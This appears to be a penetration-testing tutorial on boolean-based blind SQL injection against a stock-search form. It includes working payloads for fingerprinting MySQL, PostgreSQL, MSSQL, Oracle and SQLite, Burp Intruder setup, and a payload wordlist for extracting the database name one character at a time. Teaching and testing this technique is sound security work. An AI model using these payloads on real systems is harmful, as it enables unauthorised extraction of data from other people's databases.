Boolean-Based SQLi
Example 1
The application is a stock-control program that answers a search with a positive or negative result (item in stock or not).
Intercepting in Burp shows a POST request whose search parameter drives that positive/negative response, so the response works as a one-bit true/false oracle.
Test the parameter for SQLi with a boolean true/false condition. The known-good value on its own gives the positive response, so a true condition must keep it and a false one must flip it (both must differ from a plain syntax error):
Positive result:
search=iphone11' AND 1=1-- -
Negative result:
search=iphone11' AND 1=2-- -
Fingerprint the DBMS. database() exists only on MySQL/MariaDB: if the response stays positive, the function parsed and returned a non-empty value; on any other engine it is a syntax error and the response goes negative. Try current_database() (PostgreSQL), DB_NAME() (MSSQL) or SYS_CONTEXT('USERENV','DB_NAME') (Oracle) the same way.
search=iphone11' AND database()!=''-- -
Determine the length of the database name by testing candidate lengths for a true/false response (the numbers at the end of the wordlist below are the payload set for this; comparing with > and halving the range needs far fewer requests than testing every value):
search=iphone11' AND LENGTH(database())=10-- -
Extract the DB name char by char with Burp Intruder: mark the compared character as the payload position, load the character wordlist below as the payload set, and step the SUBSTRING offset (1, 2, 3, ...) one position per run. A Cluster bomb attack with the offset as the first position and the character list as the second does the whole name in one run; sort results by response length or grep for the positive marker. URL-encoded as sent on the wire:
search=iphone11'+AND+SUBSTRING(database(),1,1)%3d'a'--+-
If MySQL (string comparison under the default collation is case-insensitive, so ='R' also matches 'r'; compare ASCII codes, or use BINARY, to tell the cases apart):
AND SUBSTRING(database(),9,1)='R'-- -
AND MID(database(),9,1)='R'-- -
AND ASCII(SUBSTRING(database(),9,1))=82-- -
If PostgreSQL:
AND SUBSTRING(current_database() FROM 9 FOR 1)='R'-- -
AND ASCII(SUBSTRING(current_database() FROM 9 FOR 1))=82-- -
If MSSQL (LEN() rather than LENGTH() for the length check):
AND SUBSTRING(DB_NAME(),9,1)='R'-- -
AND ASCII(SUBSTRING(DB_NAME(),9,1))=82-- -
If Oracle:
AND SUBSTR(SYS_CONTEXT('USERENV','DB_NAME'),9,1)='R'-- -
AND ASCII(SUBSTR(SYS_CONTEXT('USERENV','DB_NAME'),9,1))=82-- -
If SQLite: there is no function that returns the database name; the primary database is always literally called main, so SUBSTR('main',9,1) only tests a constant. Extract a table name from sqlite_master instead, and use UNICODE() for the code-point check because SQLite has no ASCII():
AND SUBSTR((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1),9,1)='R'-- -
AND UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1),9,1))=82-- -
Wordlist (Intruder payload set for the character position; the numbers at the end double as the payload set for the length check):
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
!
_
__
___
@
#
$
%
^
&
*
(
)
_
[
]
{
}
;
:
'
"
,
.
<
/
?
\
|
~
`
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100